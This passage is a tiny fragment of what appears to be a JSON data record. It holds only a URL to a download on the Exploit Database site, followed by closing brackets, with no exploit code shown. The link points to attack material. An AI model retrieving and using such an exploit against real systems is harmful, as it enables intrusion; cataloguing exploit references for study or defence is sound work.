"https://www.exploit-db.com/download/20581/"}]}
